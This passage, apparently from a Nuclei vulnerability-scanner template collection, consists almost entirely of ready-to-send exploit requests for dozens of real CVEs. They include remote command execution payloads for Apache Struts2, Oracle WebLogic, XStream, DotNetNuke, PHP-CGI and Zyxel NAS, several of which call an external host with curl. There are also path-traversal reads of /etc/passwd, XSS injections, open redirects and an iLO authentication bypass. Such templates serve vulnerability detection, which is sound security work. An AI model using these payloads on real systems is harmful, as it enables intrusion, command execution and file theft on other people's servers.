application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5('CVE-2012-1823'); ?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3d638155445bffb044eec401381ad784"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information 